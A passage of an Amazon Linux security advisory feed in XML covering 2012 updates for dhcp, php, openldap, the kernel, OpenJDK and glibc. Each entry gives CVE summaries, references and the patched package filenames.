</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1013" title="" id="CVE-2012-1013" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1015" title="" id="CVE-2012-1015" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:1131.html" title="" id="RHSA-2012:1131" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="krb5-pkinit-openssl" version="1.9" release="33.22.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-pkinit-openssl-1.9-33.22.amzn1.i686.rpm</filename></package><package name="krb5-server-ldap" version="1.9" release="33.22.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-server-ldap-1.9-33.22.amzn1.i686.rpm</filename></package><package name="krb5-debuginfo" version="1.9" release="33.22.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-debuginfo-1.9-33.22.amzn1.i686.rpm</filename></package><package name="krb5-devel" version="1.9" release="33.22.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-devel-1.9-33.22.amzn1.i686.rpm</filename></package><package name="krb5-workstation" version="1.9" release="33.22.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-workstation-1.9-33.22.amzn1.i686.rpm</filename></package><package name="krb5-libs" version="1.9" release="33.22.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-libs-1.9-33.22.amzn1.i686.rpm</filename></package><package name="krb5-server" version="1.9" release="33.22.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-server-1.9-33.22.amzn1.i686.rpm</filename></package><package name="krb5-server-ldap" version="1.9" release="33.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-server-ldap-1.9-33.22.amzn1.x86_64.rpm</filename></package><package name="krb5-workstation" version="1.9" release="33.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-workstation-1.9-33.22.amzn1.x86_64.rpm</filename></package><package 
name="krb5-libs" version="1.9" release="33.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-libs-1.9-33.22.amzn1.x86_64.rpm</filename></package><package name="krb5-pkinit-openssl" version="1.9" release="33.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-pkinit-openssl-1.9-33.22.amzn1.x86_64.rpm</filename></package><package name="krb5-devel" version="1.9" release="33.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-devel-1.9-33.22.amzn1.x86_64.rpm</filename></package><package name="krb5-server" version="1.9" release="33.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-server-1.9-33.22.amzn1.x86_64.rpm</filename></package><package name="krb5-debuginfo" version="1.9" release="33.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-debuginfo-1.9-33.22.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-115</id><title>Amazon Linux - ALAS-2012-115: medium priority package update for dhcp</title><issued date="2012-08-03 15:56:00" /><updated date="2014-09-14 16:49:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-3954:
Two memory leak flaws were found in the dhcpd daemon. A remote attacker could use these flaws to cause dhcpd to exhaust all available memory by sending a large number of DHCP requests.
Multiple memory leaks in ISC DHCP 4.1.x and 4.2.x before 4.2.4-P1 and 4.1-ESV before 4.1-ESV-R6 allow remote attackers to cause a denial of service (memory consumption) by sending many requests.
842428:
CVE-2012-3954 dhcp: two memory leaks may result in DoS
CVE-2012-3571:
ISC DHCP 4.1.2 through 4.2.4 and 4.1-ESV before 4.1-ESV-R6 allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a malformed client identifier.
A denial of service flaw was found in the way the dhcpd daemon handled zero-length client identifiers. A remote attacker could use this flaw to send a specially-crafted request to dhcpd, possibly causing it to enter an infinite loop and consume an excessive amount of CPU time.
842420:
CVE-2012-3571 dhcp: DoS due to error in handling malformed client identifiers
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3571" title="" id="CVE-2012-3571" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3954" title="" id="CVE-2012-3954" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:1141.html" title="" id="RHSA-2012:1141" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="dhcp" version="4.1.1" release="31.P1.17.amzn1" epoch="12" arch="i686"><filename>Packages/dhcp-4.1.1-31.P1.17.amzn1.i686.rpm</filename></package><package name="dhcp-devel" version="4.1.1" release="31.P1.17.amzn1" epoch="12" arch="i686"><filename>Packages/dhcp-devel-4.1.1-31.P1.17.amzn1.i686.rpm</filename></package><package name="dhcp-debuginfo" version="4.1.1" release="31.P1.17.amzn1" epoch="12" arch="i686"><filename>Packages/dhcp-debuginfo-4.1.1-31.P1.17.amzn1.i686.rpm</filename></package><package name="dhclient" version="4.1.1" release="31.P1.17.amzn1" epoch="12" arch="i686"><filename>Packages/dhclient-4.1.1-31.P1.17.amzn1.i686.rpm</filename></package><package name="dhcp-common" version="4.1.1" release="31.P1.17.amzn1" epoch="12" arch="i686"><filename>Packages/dhcp-common-4.1.1-31.P1.17.amzn1.i686.rpm</filename></package><package name="dhcp-common" version="4.1.1" release="31.P1.17.amzn1" epoch="12" arch="x86_64"><filename>Packages/dhcp-common-4.1.1-31.P1.17.amzn1.x86_64.rpm</filename></package><package name="dhclient" version="4.1.1" release="31.P1.17.amzn1" epoch="12" arch="x86_64"><filename>Packages/dhclient-4.1.1-31.P1.17.amzn1.x86_64.rpm</filename></package><package name="dhcp-devel" version="4.1.1" release="31.P1.17.amzn1" epoch="12" arch="x86_64"><filename>Packages/dhcp-devel-4.1.1-31.P1.17.amzn1.x86_64.rpm</filename></package><package name="dhcp-debuginfo" version="4.1.1" release="31.P1.17.amzn1" epoch="12" 
arch="x86_64"><filename>Packages/dhcp-debuginfo-4.1.1-31.P1.17.amzn1.x86_64.rpm</filename></package><package name="dhcp" version="4.1.1" release="31.P1.17.amzn1" epoch="12" arch="x86_64"><filename>Packages/dhcp-4.1.1-31.P1.17.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-116</id><title>Amazon Linux - ALAS-2012-116: low priority package update for php</title><issued date="2012-08-05 14:14:00" /><updated date="2014-09-14 16:50:00" /><severity>low</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-2688:
Unspecified vulnerability in the _php_stream_scandir function in the stream implementation in PHP before 5.3.15 and 5.4.x before 5.4.5 has unknown impact and remote attack vectors, related to an "overflow."
828051:
CVE-2012-2688 php: Integer Signedness issues in _php_stream_scandir
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2688" title="" id="CVE-2012-2688" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="php-cli" version="5.3.15" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php-cli-5.3.15-1.22.amzn1.i686.rpm</filename></package><package name="php-fpm" version="5.3.15" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php-fpm-5.3.15-1.22.amzn1.i686.rpm</filename></package><package name="php-mysqlnd" version="5.3.15" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php-mysqlnd-5.3.15-1.22.amzn1.i686.rpm</filename></package><package name="php-pgsql" version="5.3.15" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php-pgsql-5.3.15-1.22.amzn1.i686.rpm</filename></package><package name="php-debuginfo" version="5.3.15" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php-debuginfo-5.3.15-1.22.amzn1.i686.rpm</filename></package><package name="php-tidy" version="5.3.15" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php-tidy-5.3.15-1.22.amzn1.i686.rpm</filename></package><package name="php-xml" version="5.3.15" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php-xml-5.3.15-1.22.amzn1.i686.rpm</filename></package><package name="php-imap" version="5.3.15" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php-imap-5.3.15-1.22.amzn1.i686.rpm</filename></package><package name="php-xmlrpc" version="5.3.15" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php-xmlrpc-5.3.15-1.22.amzn1.i686.rpm</filename></package><package name="php" version="5.3.15" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php-5.3.15-1.22.amzn1.i686.rpm</filename></package><package name="php-recode" version="5.3.15" release="1.22.amzn1" epoch="0" 
arch="i686"><filename>Packages/php-recode-5.3.15-1.22.amzn1.i686.rpm</filename></package><package name="php-mysql" version="5.3.15" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php-mysql-5.3.15-1.22.amzn1.i686.rpm</filename></package><package name="php-devel" version="5.3.15" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php-devel-5.3.15-1.22.amzn1.i686.rpm</filename></package><package name="php-intl" version="5.3.15" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php-intl-5.3.15-1.22.amzn1.i686.rpm</filename></package><package name="php-ldap" version="5.3.15" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php-ldap-5.3.15-1.22.amzn1.i686.rpm</filename></package><package name="php-mssql" version="5.3.15" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php-mssql-5.3.15-1.22.amzn1.i686.rpm</filename></package><package name="php-pdo" version="5.3.15" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php-pdo-5.3.15-1.22.amzn1.i686.rpm</filename></package><package name="php-gd" version="5.3.15" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php-gd-5.3.15-1.22.amzn1.i686.rpm</filename></package><package name="php-snmp" version="5.3.15" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php-snmp-5.3.15-1.22.amzn1.i686.rpm</filename></package><package name="php-pspell" version="5.3.15" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php-pspell-5.3.15-1.22.amzn1.i686.rpm</filename></package><package name="php-soap" version="5.3.15" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php-soap-5.3.15-1.22.amzn1.i686.rpm</filename></package><package name="php-bcmath" version="5.3.15" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php-bcmath-5.3.15-1.22.amzn1.i686.rpm</filename></package><package name="php-mcrypt" version="5.3.15" release="1.22.amzn1" epoch="0" 
arch="i686"><filename>Packages/php-mcrypt-5.3.15-1.22.amzn1.i686.rpm</filename></package><package name="php-odbc" version="5.3.15" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php-odbc-5.3.15-1.22.amzn1.i686.rpm</filename></package><package name="php-embedded" version="5.3.15" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php-embedded-5.3.15-1.22.amzn1.i686.rpm</filename></package><package name="php-mbstring" version="5.3.15" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php-mbstring-5.3.15-1.22.amzn1.i686.rpm</filename></package><package name="php-common" version="5.3.15" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php-common-5.3.15-1.22.amzn1.i686.rpm</filename></package><package name="php-process" version="5.3.15" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php-process-5.3.15-1.22.amzn1.i686.rpm</filename></package><package name="php-dba" version="5.3.15" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php-dba-5.3.15-1.22.amzn1.i686.rpm</filename></package><package name="php-devel" version="5.3.15" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-devel-5.3.15-1.22.amzn1.x86_64.rpm</filename></package><package name="php-mcrypt" version="5.3.15" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mcrypt-5.3.15-1.22.amzn1.x86_64.rpm</filename></package><package name="php-odbc" version="5.3.15" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-odbc-5.3.15-1.22.amzn1.x86_64.rpm</filename></package><package name="php-mbstring" version="5.3.15" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mbstring-5.3.15-1.22.amzn1.x86_64.rpm</filename></package><package name="php-mysql" version="5.3.15" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mysql-5.3.15-1.22.amzn1.x86_64.rpm</filename></package><package name="php-mysqlnd" version="5.3.15" release="1.22.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php-mysqlnd-5.3.15-1.22.amzn1.x86_64.rpm</filename></package><package name="php-recode" version="5.3.15" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-recode-5.3.15-1.22.amzn1.x86_64.rpm</filename></package><package name="php-ldap" version="5.3.15" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-ldap-5.3.15-1.22.amzn1.x86_64.rpm</filename></package><package name="php-bcmath" version="5.3.15" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-bcmath-5.3.15-1.22.amzn1.x86_64.rpm</filename></package><package name="php-xml" version="5.3.15" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-xml-5.3.15-1.22.amzn1.x86_64.rpm</filename></package><package name="php-pspell" version="5.3.15" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pspell-5.3.15-1.22.amzn1.x86_64.rpm</filename></package><package name="php-imap" version="5.3.15" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-imap-5.3.15-1.22.amzn1.x86_64.rpm</filename></package><package name="php-fpm" version="5.3.15" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-fpm-5.3.15-1.22.amzn1.x86_64.rpm</filename></package><package name="php-pgsql" version="5.3.15" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pgsql-5.3.15-1.22.amzn1.x86_64.rpm</filename></package><package name="php-intl" version="5.3.15" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-intl-5.3.15-1.22.amzn1.x86_64.rpm</filename></package><package name="php-snmp" version="5.3.15" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-snmp-5.3.15-1.22.amzn1.x86_64.rpm</filename></package><package name="php-embedded" version="5.3.15" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-embedded-5.3.15-1.22.amzn1.x86_64.rpm</filename></package><package name="php-xmlrpc" version="5.3.15" release="1.22.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php-xmlrpc-5.3.15-1.22.amzn1.x86_64.rpm</filename></package><package name="php-soap" version="5.3.15" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-soap-5.3.15-1.22.amzn1.x86_64.rpm</filename></package><package name="php-common" version="5.3.15" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-common-5.3.15-1.22.amzn1.x86_64.rpm</filename></package><package name="php-debuginfo" version="5.3.15" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-debuginfo-5.3.15-1.22.amzn1.x86_64.rpm</filename></package><package name="php-tidy" version="5.3.15" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-tidy-5.3.15-1.22.amzn1.x86_64.rpm</filename></package><package name="php-gd" version="5.3.15" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-gd-5.3.15-1.22.amzn1.x86_64.rpm</filename></package><package name="php-pdo" version="5.3.15" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pdo-5.3.15-1.22.amzn1.x86_64.rpm</filename></package><package name="php-cli" version="5.3.15" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-cli-5.3.15-1.22.amzn1.x86_64.rpm</filename></package><package name="php-process" version="5.3.15" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-process-5.3.15-1.22.amzn1.x86_64.rpm</filename></package><package name="php-mssql" version="5.3.15" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mssql-5.3.15-1.22.amzn1.x86_64.rpm</filename></package><package name="php-dba" version="5.3.15" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-dba-5.3.15-1.22.amzn1.x86_64.rpm</filename></package><package name="php" version="5.3.15" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-5.3.15-1.22.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" 
author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-117</id><title>Amazon Linux - ALAS-2012-117: low priority package update for openldap</title><issued date="2012-08-18 05:14:00" /><updated date="2014-09-14 16:50:00" /><severity>low</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-2668:
libraries/libldap/tls_m.c in OpenLDAP, possibly 2.4.31 and earlier, when using the Mozilla NSS backend, always uses the default cipher suite even when TLSCipherSuite is set, which might cause OpenLDAP to use weaker ciphers than intended and make it easier for remote attackers to obtain sensitive information.
It was found that the OpenLDAP server daemon ignored olcTLSCipherSuite settings. This resulted in the default cipher suite always being used, which could lead to weaker than expected ciphers being accepted during Transport Layer Security (TLS) negotiation with OpenLDAP clients.
825875:
CVE-2012-2668 openldap: does not honor TLSCipherSuite settings
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2668" title="" id="CVE-2012-2668" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:1151.html" title="" id="RHSA-2012:1151" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="openldap-clients" version="2.4.23" release="26.16.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-clients-2.4.23-26.16.amzn1.i686.rpm</filename></package><package name="openldap-devel" version="2.4.23" release="26.16.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-devel-2.4.23-26.16.amzn1.i686.rpm</filename></package><package name="openldap-debuginfo" version="2.4.23" release="26.16.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-debuginfo-2.4.23-26.16.amzn1.i686.rpm</filename></package><package name="openldap-servers" version="2.4.23" release="26.16.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-servers-2.4.23-26.16.amzn1.i686.rpm</filename></package><package name="openldap-servers-sql" version="2.4.23" release="26.16.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-servers-sql-2.4.23-26.16.amzn1.i686.rpm</filename></package><package name="openldap" version="2.4.23" release="26.16.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-2.4.23-26.16.amzn1.i686.rpm</filename></package><package name="openldap-clients" version="2.4.23" release="26.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-clients-2.4.23-26.16.amzn1.x86_64.rpm</filename></package><package name="openldap-servers-sql" version="2.4.23" release="26.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-servers-sql-2.4.23-26.16.amzn1.x86_64.rpm</filename></package><package name="openldap" version="2.4.23" release="26.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-2.4.23-26.16.amzn1.x86_64.rpm</filename></package><package name="openldap-devel" version="2.4.23" 
release="26.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-devel-2.4.23-26.16.amzn1.x86_64.rpm</filename></package><package name="openldap-servers" version="2.4.23" release="26.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-servers-2.4.23-26.16.amzn1.x86_64.rpm</filename></package><package name="openldap-debuginfo" version="2.4.23" release="26.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-debuginfo-2.4.23-26.16.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-118</id><title>Amazon Linux - ALAS-2012-118: medium priority package update for kernel</title><issued date="2012-08-21 21:04:00" /><updated date="2014-09-14 16:51:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-3430:
820039:
CVE-2012-3430 kernel: recv{from,msg}() on an rds socket can leak kernel memory
* A flaw was found in the way the msg_namelen variable in the rds_recvmsg() function of the Linux kernel's Reliable Datagram Sockets (RDS) protocol implementation was initialized. A local, unprivileged user could use this flaw to leak kernel stack memory to user-space.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3430" title="" id="CVE-2012-3430" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="kernel-doc" version="3.2.28" release="45.62.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-3.2.28-45.62.amzn1.noarch.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.2.28" release="45.62.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-3.2.28-45.62.amzn1.i686.rpm</filename></package><package name="kernel" version="3.2.28" release="45.62.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-3.2.28-45.62.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="3.2.28" release="45.62.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-3.2.28-45.62.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="3.2.28" release="45.62.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-3.2.28-45.62.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="3.2.28" release="45.62.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-3.2.28-45.62.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="3.2.28" release="45.62.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-3.2.28-45.62.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="3.2.28" release="45.62.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-3.2.28-45.62.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="3.2.28" release="45.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-3.2.28-45.62.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="3.2.28" release="45.62.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-3.2.28-45.62.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="3.2.28" release="45.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-3.2.28-45.62.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="3.2.28" release="45.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-3.2.28-45.62.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="3.2.28" release="45.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-3.2.28-45.62.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.2.28" release="45.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-3.2.28-45.62.amzn1.x86_64.rpm</filename></package><package name="kernel" version="3.2.28" release="45.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-3.2.28-45.62.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-119</id><title>Amazon Linux - ALAS-2012-119: important priority package update for java-1.6.0-openjdk</title><issued date="2012-09-04 10:22:00" /><updated date="2014-09-14 16:54:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-1682:
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 6 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Beans, a different vulnerability than CVE-2012-3136. NOTE: Oracle has not commented on claims from a downstream vendor that this issue is related to "XMLDecoder security issue via ClassFinder."
It was discovered that the Beans component in OpenJDK did not perform permission checks properly. An untrusted Java application or applet could use this flaw to use classes from restricted packages, allowing it to bypass Java sandbox restrictions.
853097:
CVE-2012-1682 OpenJDK: beans ClassFinder insufficient permission checks (beans, 7162476)
CVE-2012-0547:
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 6 and earlier, and 6 Update 34 and earlier, has no impact and remote attack vectors involving AWT and "a security-in-depth issue that is not directly exploitable but which can be used to aggravate security vulnerabilities that can be directly exploited." NOTE: this identifier was assigned by the Oracle CNA, but CVE is not intended to cover defense-in-depth issues that are only exposed by the presence of other vulnerabilities. NOTE: Oracle has not commented on claims from a downstream vendor that this issue is related to "toolkit internals references."
This update fixes several vulnerabilities in the Oracle Java Runtime Environment and the Oracle Java Software Development Kit. Further information about these flaws can be found on the Oracle Java SE Critical Patch Update Advisory and Oracle Security Alert pages, listed in the References section.
This update fixes several vulnerabilities in the IBM Java Runtime Environment and the IBM Java Software Development Kit. Detailed vulnerability descriptions are linked from the IBM Security alerts page, listed in the References section.
A hardening fix was applied to the AWT component in OpenJDK, removing functionality from the restricted SunToolkit class that was used in combination with other flaws to bypass Java sandbox restrictions.
853228:
CVE-2012-0547 OpenJDK: AWT hardening fixes (AWT, 7163201)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0547" title="" id="CVE-2012-0547" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1682" title="" id="CVE-2012-1682" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:1221.html" title="" id="RHSA-2012:1221" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="java-1.6.0-openjdk-demo" version="1.6.0.0" release="52.1.11.4.46.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.0-52.1.11.4.46.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.0" release="52.1.11.4.46.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-1.6.0.0-52.1.11.4.46.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.0" release="52.1.11.4.46.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.0-52.1.11.4.46.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.0" release="52.1.11.4.46.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.0-52.1.11.4.46.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.0" release="52.1.11.4.46.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.0-52.1.11.4.46.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.0" release="52.1.11.4.46.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.0-52.1.11.4.46.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.0" release="52.1.11.4.46.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.0-52.1.11.4.46.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.0" 
release="52.1.11.4.46.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.0-52.1.11.4.46.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.0" release="52.1.11.4.46.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.0-52.1.11.4.46.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.0" release="52.1.11.4.46.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.0-52.1.11.4.46.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.0" release="52.1.11.4.46.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-1.6.0.0-52.1.11.4.46.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.0" release="52.1.11.4.46.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.0-52.1.11.4.46.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-120</id><title>Amazon Linux - ALAS-2012-120: medium priority package update for glibc</title><issued date="2012-09-04 10:23:00" /><updated date="2014-09-14 16:54:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-3480:
Multiple integer overflows in the (1) strtod, (2) strtof, (3) strtold, (4) strtod_l, and other unspecified "related functions" in stdlib in GNU C Library (aka glibc or libc6) 2.16 allow local users to cause a denial of service (application crash) and possibly execute arbitrary code via a long string, which triggers a stack-based buffer overflow.
Multiple integer overflow flaws, leading to stack-based buffer overflows, were found in glibc's functions for converting a string to a numeric representation (strtod(), strtof(), and strtold()). If an application used such a function on attacker controlled input, it could cause the application to crash or, potentially, execute arbitrary code.
847715:
CVE-2012-3480 glibc: Integer overflows, leading to stack-based buffer overflows in strto* related routines
